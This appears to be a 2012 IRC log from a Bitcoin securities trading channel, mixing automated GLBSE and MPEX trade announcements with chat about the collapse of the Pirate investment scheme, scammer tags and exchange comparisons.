[BIB.PIRATE] 3 @ 0.2627 = 0.7881 BTC [-] Aug 27 17:23:42 [GLBSE] [BIB.PIRATE] 10 @ 0.2626 = 2.626 BTC [-] Aug 27 17:23:43 [GLBSE] [BIB.PIRATE] 39 @ 0.26 = 10.14 BTC [-] Aug 27 17:24:29 [GLBSE] [FPGA.CONTRACT] 16 @ 0.1298 = 2.0768 BTC [+] Aug 27 17:26:11 Chaang-Noi: http://www.betsofbitco.in/item?id=588 Aug 27 17:26:14 DeaDTerra: is GIPPT still trading? isn't it finished? Aug 27 17:26:32 oh boy Aug 27 17:26:40 they are getting scary low again Aug 27 17:26:51 BIB.PIRATE and TYGRR-BOND-P Aug 27 17:26:54 JWU_42 i wouldn't expect a rally. Aug 27 17:27:01 heh - sadly Aug 27 17:27:30 [MPEX] [S.BVPS] 117 @ 0.00352293 = 0.4122 BTC [-] Aug 27 17:27:34 better off this way. lessons learned, moving on. Aug 27 17:27:45 better for some maybe - not me Aug 27 17:28:00 mircea_popescu: I think not Aug 27 17:28:09 there will be plenty of people willing to get bitten again Aug 27 17:28:13 maybe not the same Aug 27 17:28:17 perhaps a new batch Aug 27 17:28:26 i doubt it. Aug 27 17:28:29 suckers will ever be Aug 27 17:28:32 [GLBSE] [FPGAMINING] 9 @ 0.949999 = 8.55 BTC [-] Aug 27 17:28:34 [GLBSE] [FPGAMINING] 6 @ 0.949999 = 5.7 BTC [-] Aug 27 17:28:36 but the sort of mass hysteria where people pretending to know finance Aug 27 17:28:37 JWU_42: whats your exposure? Aug 27 17:28:41 were actually claiming this is respectable... Aug 27 17:28:50 " nefario1 | as have Goat " ??? Aug 27 17:28:53 that's not coming back. Aug 27 17:28:55 [GLBSE] [GIGAMINING] 1 @ 0.962 BTC [+] Aug 27 17:28:55 nefario1: plenty Aug 27 17:29:01 ouch Aug 27 17:29:05 paid out? Aug 27 17:29:23 gambling Aug 27 17:29:38 [GLBSE] [MMM] 5 @ 0.7999 = 3.9995 BTC [+] Aug 27 17:29:57 JWU_42 listen, for my own curiosity. did you read the girl's post on the forum back in april or w/e, explaining exactly why pirate is nothing to get involved in ? Aug 27 17:30:04 the only thing being gambled on is the time of default Aug 27 17:30:09 and whether you can get out in itme Aug 27 17:30:10 time Aug 27 17:30:35 mircea_popescu: yes Aug 27 17:30:44 and what you made of it, at that time ? Aug 27 17:30:48 opinons are like a**holes Aug 27 17:30:54 i see. Aug 27 17:31:21 and yes - I get what I get - I took the risk Aug 27 17:31:23 JWU_42: how are opinions like assholes? do tell Aug 27 17:31:31 everyone has one. Aug 27 17:31:36 lol Aug 27 17:31:37 nefario1: everyone has one... Aug 27 17:31:44 https://bitcointalk.org/index.php?topic=101902.msg1137034#msg1137034 MAKE IT STOP Aug 27 17:31:46 atlasi wont bet on that.. Aug 27 17:31:54 JWU_42 im not saying anything, i was honestly just curious what could have been done differently to help people at that time. Aug 27 17:32:01 Of course. Just thought it might intrigue you Aug 27 17:32:04 we had a two hour argument in my board over what exactly to do. Aug 27 17:32:32 [MPEX] [S.MPOE] 11700 @ 0.0003816 = 4.4647 BTC [+] Aug 27 17:32:34 [MPEX] [S.MPOE] 27613 @ 0.00038066 = 10.5112 BTC [-] Aug 27 17:32:44 as he has said - shutting it down abruptly has caused more problems then winding it down 9if that is even possible) Aug 27 17:33:10 its a bald face lie. Aug 27 17:33:28 he could have just done his stuff first and shut it down after, if it was in fact planned to survive. Aug 27 17:33:31 it was planned to fail. Aug 27 17:34:17 mircea_popescu: as with so many things, niot just finance, ego becomes involved and bad decisions are made Aug 27 17:34:21 yes. Aug 27 17:34:31 the thing is, some people actually have a lot of experience and knowledge under their belt. Aug 27 17:34:39 this is not shit. this is there to help others by it. Aug 27 17:34:39 https://bitcointalk.org/index.php?topic=82572.msg1137033#msg1137033 Aug 27 17:34:41 www.youtube.com/watch?v=6PG2mdU_i8k Aug 27 17:34:47 [GLBSE] [BIB.PIRATE] 3 @ 0.2601 = 0.7803 BTC [+] Aug 27 17:34:48 [GLBSE] [BIB.PIRATE] 11 @ 0.24 = 2.64 BTC [-] Aug 27 17:34:54 problem with forum-style communications is exactly what you say : opinions become like assholes. Aug 27 17:35:00 we need better hierarchy in btc-land. Aug 27 17:35:21 ok Aug 27 17:35:55 was that better Aug 27 17:36:03 heh Aug 27 17:36:05 better how ? Aug 27 17:36:13 o, voice only ? Aug 27 17:36:14 dictatorship Aug 27 17:36:15 im asking :) Aug 27 17:36:19 ? Aug 27 17:36:32 theymosmae 50 btc from my bond.. Aug 27 17:36:34 i don't think it was. Aug 27 17:36:38 doubt he will get a scammers tag Aug 27 17:37:05 sorry why should theymos get the scammers tag? Aug 27 17:37:15 He would have to apply it to himself Aug 27 17:37:18 for the lulz Aug 27 17:37:49 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Aug 27 17:38:32 [GLBSE] [PPT.E] 15 @ 0.5 = 7.5 BTC [-] Aug 27 17:39:25 usagi : [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] :D Aug 27 17:39:28 nefario1 people wanted to get ppt people a scammers tag.. then i told and showed them it was theymos who asked for them to be made on glbse Aug 27 17:39:38 [GLBSE] [PPT.A] 30 @ 0.5 = 15 BTC [-] Aug 27 17:39:47 i doubt theymos will give you and me scammer tags for something he asked for Aug 27 17:40:41 [GLBSE] [KRAKEN] 1 @ 0.01 BTC Aug 27 17:40:45 usagi: http://sackheads.org/~bnaylor/spew/away_msgs.html Aug 27 17:41:11 ?? can you collect more than one scammer tag ?? like , is there a whole set ? Aug 27 17:42:30 lol Aug 27 17:42:35 COLLECT'EM ALL Aug 27 17:42:39 SCAMMING ACHIEVEMENTS Aug 27 17:42:48 lol Aug 27 17:42:50 no Aug 27 17:42:55 you just get one Aug 27 17:42:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.3101 BTC [+] Aug 27 17:42:58 [GLBSE] [TYGRR.BOND-P] 499 @ 0.31 = 154.69 BTC [-] Aug 27 17:43:00 scammer yugio Aug 27 17:43:03 well matthe might get mroe than one Aug 27 17:43:03 [GLBSE] [DMC] 10 @ 0.06 = 0.6 BTC [+] Aug 27 17:43:07 yugio lol Aug 27 17:43:08 *pokemon (for the older kids) Aug 27 17:43:33 you could trade them like magic the gathering cards Aug 27 17:43:38 seewotididthere Aug 27 17:43:47 Achievement Unlocked: Scammed users out of 1000 BTC using fraudulent securities. Aug 27 17:44:15 ;;sl mtgox magic the gathering Aug 27 17:44:15 https://bitcointalk.org/index.php?topic=19632.0 | Because early bitcoin guys liked to trade Magic The Gathering cards. But yeah I agree MtGox should be shutdown or refund millions $ to ... Aug 27 17:44:22 grrr Aug 27 17:44:31 fu gribbel Aug 27 17:44:54 [GLBSE] [BITCOINMINV] 1 @ 0.145 BTC [-] Aug 27 17:45:31 What is the peak of the GLBSE trading day? Aug 27 17:45:36 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Aug 27 17:46:26 [MPEX] [S.MPOE] 60 @ 0.00038066 = 0.0228 BTC [-] Aug 27 17:46:27 [MPEX] [S.MPOE] 40765 @ 0.00038058 = 15.5143 BTC [-] Aug 27 17:46:29 [MPEX] [S.MPOE] 1875 @ 0.00038026 = 0.713 BTC [-] Aug 27 17:46:50 glbse is slow now Aug 27 17:46:53 Azelphur: Last updated: July 24, 2000 Aug 27 17:47:03 hahaha Aug 27 17:47:04 usagi: still valid Aug 27 17:47:25 the annoyingness of away messages has not decreased over the past decade :P Aug 27 17:47:39 Whoa Aug 27 17:47:55 hehe Aug 27 17:48:29 lol this guy was using HTML5 before it was cool. Aug 27 17:48:37 It's just a plain tag Aug 27 17:48:44 [GLBSE] [TEEK.B] 1 @ 0.9999 BTC [+] Aug 27 17:50:16 [MPEX] [O.BTCUSD.P080N] 10 @ 0.06724003 = 0.6724 BTC [-] Aug 27 17:50:43 https://bitcointalk.org/index.php?topic=85687.msg1137080#msg1137080 Aug 27 17:50:45 Big day Aug 27 17:52:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.312 BTC [+] Aug 27 17:52:30 wghoa nelly Aug 27 17:52:31 ;;ticker Aug 27 17:52:32 Best bid: 11.7211, Best ask: 11.79, Bid-ask spread: 0.06890, Last trade: 11.84, 24 hour volume: 108013, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 17:53:00 [GLBSE] [TYGRR.BOND-P] 4 @ 0.312 = 1.248 BTC [+] Aug 27 17:55:50 [GLBSE] [KRAKEN] 100 @ 0.01 = 1 BTC Aug 27 17:56:53 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Aug 27 17:58:21 ;;bc,stats Aug 27 17:58:23 Current Blocks: 195943 | Current Difficulty: 2440642.606916 | Next Difficulty At Block: 197567 | Next Difficulty In: 1624 blocks | Next Difficulty In About: 1 week, 3 days, 13 hours, 31 minutes, and 28 seconds | Next Difficulty Estimate: 2612644.47566272 | Estimated Percent Change: 7.04740088775 Aug 27 18:04:45 [MPEX] [S.MPOE] 16646 @ 0.00038026 = 6.3298 BTC [-] Aug 27 18:04:46 [MPEX] [S.MPOE] 33763 @ 0.00038014 = 12.8347 BTC [-] Aug 27 18:05:42 More threats of violence are being made against Pirate. Aug 27 18:05:48 People know where he lives. Aug 27 18:05:56 He's going to pay or he's going to have to skip town. Aug 27 18:06:08 The latter might be cheaper. Aug 27 18:06:24 I was skimming the log and I see you 2 dimwits ( mircea_popescu and EmanuelDeOrtego) have really hard time saying anything with a value. What if you 2 get a private room and amuse each other in privacy? Aug 27 18:06:40 *crickets* Aug 27 18:07:33 EmanuelDeOrtego: you are right, even crickets have more to say than you 2 Aug 27 18:08:18 ooh Aug 27 18:08:28 dragon dice are a nice brand Aug 27 18:08:33 good construction Aug 27 18:08:43 They stole my name. Aug 27 18:08:45 [MPEX] [F.GIGA.ETF] 13400 @ 0.00094661 = 12.6846 BTC [+] Aug 27 18:08:47 [MPEX] [F.GIGA.ETF] 900 @ 0.00095074 = 0.8557 BTC [+] Aug 27 18:08:53 I invented a game called dragon dice on a mud in the early 90s Aug 27 18:08:57 [GLBSE] [BIB.PIRATE] 18 @ 0.235 = 4.23 BTC [-] Aug 27 18:08:58 Medievia Aug 27 18:09:09 .235 hmmm Aug 27 18:09:12 I wrote a gambling bot there. And they banned me because they thought I was scamming Aug 27 18:09:18 lol Aug 27 18:09:22 I miss the 90s Aug 27 18:09:37 sucks. Aug 27 18:09:42 Later when I showed them the code they let me back on but they wouldnt let me play the bot Aug 27 18:10:02 So I moved to ultima online and did it there. It blew up because someone martingaled me and I didnt have the capital Aug 27 18:10:10 [GLBSE] [GIGAMINING] 4 @ 0.9599 = 3.8396 BTC [-] Aug 27 18:10:16 I lost like 7000 UO gold Aug 27 18:10:22 The house always has to win. : ( Aug 27 18:10:25 haha Aug 27 18:10:36 it was over a week's worth of farming Aug 27 18:11:37 EmanuelDeOrtego y u no trollin somewhere else Aug 27 18:11:58 jcpham : when did you register a request to be paid out from pirate ? Aug 27 18:12:16 interestingly enough Aug 27 18:12:26 i have not made one yet Aug 27 18:12:38 lol Aug 27 18:12:40 um ?! Aug 27 18:13:08 jcpham: Stating reality isn't trolling. Aug 27 18:13:16 did i not answer poperly? Aug 27 18:13:29 I am sorry you lost money. Aug 27 18:13:31 so how do you expect to be paid then lol Aug 27 18:13:40 i'm not sure Aug 27 18:13:43 i made a request Aug 27 18:13:45 ahahah Aug 27 18:13:48 when Chaaang-Noi ? Aug 27 18:13:50 where does one register a request Aug 27 18:13:59 and why does register Aug 27 18:14:00 [GLBSE] [PUREMINING] 2 @ 0.098 = 0.196 BTC [+] Aug 27 18:14:06 15th or 16th texas time Aug 27 18:14:07 well i dunno, all i know is nanotube mentioned this Aug 27 18:14:12 if the interest is runnin Aug 27 18:14:22 im before the guy nanotube knowsabout Aug 27 18:14:36 i've made no request Aug 27 18:14:41 iv not talked to nanotube Aug 27 18:14:47 and i'm no obligated to anyone downstream Aug 27 18:14:55 Aug 27 16:23:07 earliest recorded withdrawal request must be paid out by aug29. Aug 27 18:14:58 this is where the pass-throughs fucked up tbh Aug 27 18:15:15 you pass-through guys are in default Aug 27 18:15:21 because you accepted money from others Aug 27 18:15:35 which you shouldn't have done if you couldn't cover it Aug 27 18:16:03 but i've made no request ad i expect full interest Aug 27 18:16:22 well, here's to hoping your expector is in good working order Aug 27 18:16:44 i believe i had the chance to recover some funds but i declined Aug 27 18:16:47 respectfully Aug 27 18:17:13 aha ? Aug 27 18:17:29 it's all shuffled around, you see Aug 27 18:17:40 more like investing in people Aug 27 18:17:44 so strange Aug 27 18:17:51 uhm Aug 27 18:17:54 i dont really follow. Aug 27 18:18:06 let's eat ponies Aug 27 18:18:15 and shit unicorns Aug 27 18:19:55 I imagine Pirate is going to start playing victim at some point. Aug 27 18:20:07 smh Aug 27 18:20:10 Talking about how more people threatened his family. Aug 27 18:20:24 and that he has to give up for safety and that we only have ourselves to blame. Aug 27 18:20:29 Then I will laugh. Aug 27 18:20:39 i really like the international aspect of bitcoin. im atm talking to a chinese guy who spent 48 hours trying to get gpg going and a romanian guy who's trying to buy bitcoins but the bank fees are huge. Aug 27 18:20:43 the world is such a large place... Aug 27 18:20:50 at some point i'm goin to not pay attention to irc anymore Aug 27 18:20:54 hopefully soon Aug 27 18:21:02 jcpham moving to the forums ? Aug 27 18:21:08 funny guy Aug 27 18:21:12 >D Aug 27 18:21:29 jcpham is really hurting Aug 27 18:21:34 he had a lot of money with Pirate Aug 27 18:24:45 [GLBSE] [FPGAMINING] 4 @ 0.9332 = 3.7328 BTC [-] Aug 27 18:24:47 [GLBSE] [FPGAMINING] 4 @ 0.9331 = 3.7324 BTC [-] Aug 27 18:24:48 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 27 18:24:49 [GLBSE] [FPGAMINING] 1 @ 0.881 BTC [-] Aug 27 18:24:50 [GLBSE] [FPGAMINING] 1 @ 0.88 BTC [-] Aug 27 18:24:51 [GLBSE] [FPGAMINING] 9 @ 0.855 = 7.695 BTC [-] Aug 27 18:24:52 [GLBSE] [FPGAMINING] 60 @ 0.854 = 51.24 BTC [-] Aug 27 18:26:09 few thousand or less Aug 27 18:26:13 bbl shower Aug 27 18:26:37 Matthew's bet is going to set the standard with this. Aug 27 18:26:45 [MPEX] [S.MPOE] 31800 @ 0.00038272 = 12.1705 BTC [+] Aug 27 18:26:45 We will be counting down Sept. 9 Aug 27 18:27:09 yeah matt is way more involved Aug 27 18:27:18 i hope he knows something i don't ;) Aug 27 18:28:26 !ticker s.dice Aug 27 18:28:27 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (30250 shares, 102.85 BTC), 30day: 0.0032 / 0.00322446 / 0.0034 (2295200 shares, 7,400.78 BTC) Aug 27 18:29:54 i can tell you that all my actual principal was withdrawn and used elsewhere Aug 27 18:29:57 [MPEX] [F.GIGA.ETF] 4058 @ 0.00095074 = 3.8581 BTC [+] Aug 27 18:29:58 [MPEX] [F.GIGA.ETF] 6942 @ 0.00095334 = 6.6181 BTC [+] Aug 27 18:30:05 and my coount balance was all crazy interest Aug 27 18:30:10 if that helps Aug 27 18:30:59 nefario1: what happened to GLBSE? It's getting slow again Aug 27 18:41:49 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Aug 27 18:42:13 [MPEX] [S.MPOE] 3855 @ 0.00038272 = 1.4754 BTC [+] Aug 27 18:42:14 [MPEX] [S.MPOE] 29337 @ 0.00038014 = 11.1522 BTC [-] Aug 27 18:42:16 [MPEX] [S.MPOE] 3100 @ 0.00037994 = 1.1778 BTC [-] Aug 27 18:42:17 [MPEX] [S.MPOE] 24416 @ 0.00037985 = 9.2744 BTC [-] Aug 27 18:43:57 [GLBSE] [NYAN.B] 10 @ 1 = 10 BTC [+] Aug 27 18:47:09 !pl NYAN.C Aug 27 18:47:10 !pl [@] [] Aug 27 18:47:13 !pl NYAN.C 1 Aug 27 18:47:13 Requesting data from GLBSE (might take a while). Aug 27 18:47:15 NYAN.C [1@1BTC] paid: 0.10580463 BTC. Last price: 0.7 BTC. Capital gain: -0.3 BTC. Total: -0.19419537 BTC. (-19.4%) Aug 27 18:47:39 !pl NYAN.A 1 Aug 27 18:47:40 Requesting data from GLBSE (might take a while). Aug 27 18:47:46 NYAN.A [1@1BTC] paid: 0.04 BTC. Last price: 1 BTC. Capital gain: 0 BTC. Total: 0.04 BTC. (4%) Aug 27 18:47:51 !pl NYAN.B 1 Aug 27 18:47:52 Requesting data from GLBSE (might take a while). Aug 27 18:47:53 NYAN.B [1@1BTC] paid: 0.06081227 BTC. Last price: 1 BTC. Capital gain: 0 BTC. Total: 0.06081227 BTC. (6.1%) Aug 27 18:48:38 Pirate might be back on the market again. Aug 27 18:48:51 !p NYAN 1 Aug 27 18:49:04 [GLBSE] [COGNITIVE] 1 @ 0.66 BTC [-] Aug 27 18:49:11 !pl NYAN Aug 27 18:49:12 !pl [@] [] Aug 27 18:49:33 !pl NYAN 1 Aug 27 18:49:33 Requesting data from GLBSE (might take a while). Aug 27 18:49:58 NYAN [1@1BTC] paid: 0.05157803 BTC. Last price: 0.9999 BTC. Capital gain: -9.9999999999989E-5 BTC. Total: 0.05147803 BTC. (5.1%) Aug 27 18:50:13 EmanuelDeOrtego: do you invent this bs as you go or is this some type of script you read and repeat when nothing else comes to mind? Aug 27 18:50:18 [GLBSE] [SYNERGY] 1 @ 0.194999 BTC [+] Aug 27 18:50:44 hm i should clear the output there Aug 27 18:51:16 [GLBSE] [PUREMINING] 1 @ 0.098 BTC [+] Aug 27 18:58:00 [GLBSE] [GSDPT] 58 @ 0.0034 = 0.1972 BTC [+] Aug 27 18:58:52 [MPEX] [S.DICE] 54705 @ 0.0034 = 185.997 BTC [+] Aug 27 19:02:56 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 27 19:06:02 [GLBSE] [OBSI.1MHS] 1 @ 0.095 BTC [-] Aug 27 19:06:07 BUY MOAR GSDPT Aug 27 19:06:24 [MPEX] [S.MPOE] 21363 @ 0.00037985 = 8.1147 BTC [-] Aug 27 19:06:25 [MPEX] [S.MPOE] 6000 @ 0.00037983 = 2.279 BTC [-] Aug 27 19:06:26 [MPEX] [S.MPOE] 12200 @ 0.00037976 = 4.6331 BTC [-] Aug 27 19:06:27 [MPEX] [S.MPOE] 15537 @ 0.00037939 = 5.8946 BTC [-] Aug 27 19:08:18 [GLBSE] [BDT] 7 @ 1.17 = 8.19 BTC [-] Aug 27 19:08:27 and my coount balance was all crazy interest << i wonder how often this is the case. Aug 27 19:10:38 [GLBSE] [YABMC] 1 @ 0.13476 BTC [-] Aug 27 19:10:52 [GLBSE] [BITCOINTORRENTZ] 5 @ 0.66599 = 3.33 BTC [-] Aug 27 19:11:11 [GLBSE] [YABMC] 3 @ 0.135 = 0.405 BTC [+] Aug 27 19:11:49 I have bought more backing so keep buying GSDPT ;) Aug 27 19:12:45 http://en.wikipedia.org/wiki/Rain_follows_the_plow this is the previous version of "global warming" Aug 27 19:13:01 !ticker s.dice Aug 27 19:13:02 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (84955 shares, 288.85 BTC), 30day: 0.0032 / 0.00322854 / 0.0034 (2349905 shares, 7,586.78 BTC) Aug 27 19:13:07 Are you sure you are not the only one who buys that stuff in mpex? Aug 27 19:13:47 lol that worked out nicely then Aug 27 19:15:06 wat did i miss Aug 27 19:15:31 yes "crazy interest" Aug 27 19:15:37 my words Aug 27 19:16:07 EskimoBob: I know he's not the only one buying on mpex Aug 27 19:16:12 i have clients too Aug 27 19:17:17 still makes no sense why did he do the "IPO" in this dump called mpex Aug 27 19:18:00 somebody has to operate an exchange Aug 27 19:18:08 personally, i prefer mpex to glbse right now, but i use both Aug 27 19:18:17 EskimoBob do you have an securities exchange Aug 27 19:18:28 i don't Aug 27 19:18:41 i'm in no position to judge others Aug 27 19:19:34 jcpham: as a client, sure you are. Aug 27 19:20:19 i'm way too kind then Aug 27 19:21:31 on one hand, mpex gives faster and more reliable service Aug 27 19:21:54 on the other, glbse has more listings Aug 27 19:22:33 [GLBSE] [DMC] 26 @ 0.06 = 1.56 BTC [+] Aug 27 19:23:46 oddly enough, i think that mpex has better charts (on the assumption that you know how the axees are defined) Aug 27 19:24:22 [GLBSE] [CIUCIU.MINING] 1 @ 0.099 BTC [+] Aug 27 19:24:54 glbse gives easier access to historical dividend information Aug 27 19:25:03 [GLBSE] [FPGAMINING] 1 @ 0.86 BTC [+] Aug 27 19:25:05 [GLBSE] [FPGAMINING] 1 @ 0.855 BTC [-] Aug 27 19:25:06 [GLBSE] [FPGAMINING] 4 @ 0.8541 = 3.4164 BTC [-] Aug 27 19:25:07 [GLBSE] [FPGAMINING] 14 @ 0.854 = 11.956 BTC [-] Aug 27 19:25:08 [GLBSE] [FPGAMINING] 9 @ 0.853 = 7.677 BTC [-] Aug 27 19:25:09 [GLBSE] [FPGAMINING] 11 @ 0.852 = 9.372 BTC [-] Aug 27 19:25:10 [GLBSE] [FPGAMINING] 5 @ 0.85 = 4.25 BTC [-] Aug 27 19:25:11 [GLBSE] [FPGAMINING] 15 @ 0.85 = 12.75 BTC [-] Aug 27 19:25:46 [GLBSE] [PPT.DIV] 10 @ 0.05 = 0.5 BTC [-] Aug 27 19:26:50 ya, what exactly is your hate EskimoBob ? Aug 27 19:26:55 [MPEX] [S.MPOE] 26900 @ 0.00037939 = 10.2056 BTC [-] Aug 27 19:27:13 you're like those people ranting about the superiority of honda civics to "shit cars" or w/e Aug 27 19:27:13 [MPEX] [S.MPOE] 13463 @ 0.00037939 = 5.1077 BTC [-] Aug 27 19:27:14 [MPEX] [S.MPOE] 7700 @ 0.00037936 = 2.9211 BTC [-] Aug 27 19:27:14 [MPEX] [S.MPOE] 7725 @ 0.00037925 = 2.9297 BTC [-] Aug 27 19:29:30 [MPEX] [S.MPOE] 45100 @ 0.00038127 = 17.1953 BTC [+] Aug 27 19:32:58 [MPEX] [S.MPOE] 7674 @ 0.00038241 = 2.9346 BTC [+] Aug 27 19:32:59 [MPEX] [S.MPOE] 2726 @ 0.00038359 = 1.0457 BTC [+] Aug 27 19:34:38 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [-] Aug 27 19:35:56 [GLBSE] [ASICMINER] 1 @ 0.09010011 BTC [-] Aug 27 19:36:21 [GLBSE] [TYGRR.BOND-P] 2 @ 0.3999 = 0.7998 BTC [+] Aug 27 19:38:37 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 27 19:41:57 [GLBSE] [MU] 10 @ 0.3901 = 3.901 BTC [-] Aug 27 19:44:41 [MPEX] [S.MPOE] 11100 @ 0.00038221 = 4.2425 BTC [-] Aug 27 19:44:42 [MPEX] [S.MPOE] 174 @ 0.00037925 = 0.066 BTC [-] Aug 27 19:44:44 [MPEX] [S.MPOE] 16406 @ 0.00037906 = 6.2189 BTC [-] Aug 27 19:44:44 [MPEX] [S.MPOE] 9120 @ 0.00037882 = 3.4548 BTC [-] Aug 27 19:44:45 [GLBSE] [GMVT-BOT] 1 @ 0.1799 BTC [+] Aug 27 19:45:11 ;;view Aug 27 19:45:12 #9826 Sat Aug 25 13:45:41 2012 smickles BUY 244.0 mpexbtc @ 244 mpexbtc (I have a deposit in the works, but would like to make an order now, so I'm looking for someone to float me some mpexbtc) Aug 27 19:45:16 ;;remove 9826 Aug 27 19:45:16 Order 9826 removed. Aug 27 19:45:44 [GLBSE] [GMVT-BOT] 20 @ 0.18 = 3.6 BTC [+] Aug 27 19:46:44 ;;ticker Aug 27 19:46:45 Best bid: 11.0162, Best ask: 11.1245, Bid-ask spread: 0.10830, Last trade: 11.0111, 24 hour volume: 131811, 24 hour low: 10.52, 24 hour high: 12.14999 Aug 27 19:46:49 [GLBSE] [OBSI.HRPT] 5 @ 0.1039 = 0.5195 BTC [-] Aug 27 19:47:00 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:47:15 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:47:21 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:47:26 [GLBSE] [OBSI.HRPT] 15 @ 0.104 = 1.56 BTC [+] Aug 27 19:47:37 how about that Aug 27 19:47:49 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:47:57 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:48:03 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:48:18 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 27 19:48:31 "Pirate: Guys, I want to pay you back but you need to stop paying so much for Bitcoins. You guys only have yourselves to blame, gosh." Aug 27 19:48:38 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:48:44 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:49:12 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:51:05 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 27 19:51:29 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 27 19:53:08 [GLBSE] [DI.BFLSC.FAIL] 1 @ 0.001 BTC [+] Aug 27 19:55:29 [MPEX] [O.BTCUSD.C200T] 5 @ 0.02949134 = 0.1475 BTC [-] Aug 27 19:55:30 [MPEX] [O.BTCUSD.C200T] 7 @ 0.02815716 = 0.1971 BTC [-] Aug 27 19:56:03 [GLBSE] [FOO.PPPPT] 3 @ 0.3201 = 0.9603 BTC [-] Aug 27 19:56:05 [GLBSE] [FOO.PPPPT] 3 @ 0.32 = 0.96 BTC [-] Aug 27 19:57:43 [GLBSE] [BIB.PIRATE] 3 @ 0.221 = 0.663 BTC [-] Aug 27 19:57:43 [GLBSE] [BIB.PIRATE] 35 @ 0.22 = 7.7 BTC [-] Aug 27 19:59:00 [GLBSE] [BMMO] 7 @ 0.1 = 0.7 BTC [-] Aug 27 20:00:44 [MPEX] [B.MPCD.C] 329 @ 0.001045 = 0.3438 BTC [+] Aug 27 20:02:51 [GLBSE] [PUREMINING] 1 @ 0.09799 BTC [-] Aug 27 20:03:30 ;;bc,24havg Aug 27 20:03:31 Error: "bc,24havg" is not a valid command. Aug 27 20:03:34 ;;bc,24hprc Aug 27 20:03:35 11.28 Aug 27 20:03:39 [GLBSE] [PUREMINING] 12 @ 0.09799 = 1.1759 BTC [-] Aug 27 20:09:52 [GLBSE] [DMC] 1 @ 0.056 BTC [-] Aug 27 20:09:54 [GLBSE] [DMC] 4 @ 0.052 = 0.208 BTC [-] Aug 27 20:10:11 [GLBSE] [BITCOINMINV] 1 @ 0.175 BTC [+] Aug 27 20:10:32 [GLBSE] [DMC] 1 @ 0.052 BTC [-] Aug 27 20:10:45 [GLBSE] [BITCOINMINV] 1 @ 0.175 BTC [+] Aug 27 20:10:52 [GLBSE] [DMC] 5 @ 0.051 = 0.255 BTC [-] Aug 27 20:11:17 [GLBSE] [DMC] 4 @ 0.05 = 0.2 BTC [-] Aug 27 20:12:21 [GLBSE] [YARR] 6 @ 0.998999 = 5.994 BTC [+] Aug 27 20:12:22 [GLBSE] [YARR] 5 @ 0.999 = 4.995 BTC [+] Aug 27 20:12:27 [GLBSE] [YARR] 3 @ 0.9999789 = 2.9999 BTC [+] Aug 27 20:12:29 [GLBSE] [YARR] 1 @ 0.9999899 BTC [+] Aug 27 20:15:04 [MPEX] [S.MPOE] 22961 @ 0.00038359 = 8.8076 BTC [+] Aug 27 20:15:05 [MPEX] [S.MPOE] 16780 @ 0.00038545 = 6.4679 BTC [+] Aug 27 20:15:09 [GLBSE] [GSDPT] 300 @ 0.0034 = 1.02 BTC [+] Aug 27 20:15:31 did the world restart ? Aug 27 20:15:34 [GLBSE] [ASICMINER] 56 @ 0.0987 = 5.5272 BTC [-] Aug 27 20:15:51 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Aug 27 20:16:21 so if anyone is interested in a discussion of btc asset exchanges security : http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ Aug 27 20:16:43 ostensibly Aug 27 20:18:44 [MPEX] [S.MPOE] 12700 @ 0.00037882 = 4.811 BTC [-] Aug 27 20:20:21 [GLBSE] [MU] 10 @ 0.3901 = 3.901 BTC [-] Aug 27 20:21:33 nefario: would you like to comment on mircea_popescu's recent link Aug 27 20:21:50 [GLBSE] [ASICMINER] 20 @ 0.0987 = 1.974 BTC [-] Aug 27 20:22:03 [GLBSE] [OBSI.1MHS] 106 @ 0.08 = 8.48 BTC [-] Aug 27 20:24:39 [GLBSE] [OBSI.ABMO] 100 @ 0.075 = 7.5 BTC [-] Aug 27 20:25:07 [GLBSE] [TYGRR.BOND-P] 1 @ 0.30021003 BTC [-] Aug 27 20:28:31 [GLBSE] [GMVT-BOT] 2 @ 0.18 = 0.36 BTC [+] Aug 27 20:30:07 [MPEX] [F.GIGA.ETF] 3307 @ 0.00095055 = 3.1435 BTC [-] Aug 27 20:34:30 smickles or, for that matter, EskimoBob Aug 27 20:35:17 mircea: Could you open up a SMF forum for securities and speculation on polimedia? : ) It would be nice to have an escape from Bitcointalk Aug 27 20:36:33 [GLBSE] [BITBOND] 6 @ 0.4494 = 2.6964 BTC [+] Aug 27 20:36:34 [GLBSE] [BITBOND] 200 @ 0.4495 = 89.9 BTC [+] Aug 27 20:36:36 [GLBSE] [BITBOND] 61 @ 0.4497 = 27.4317 BTC [+] Aug 27 20:38:02 [GLBSE] [BIB.PIRATE] 1 @ 0.2 BTC [-] 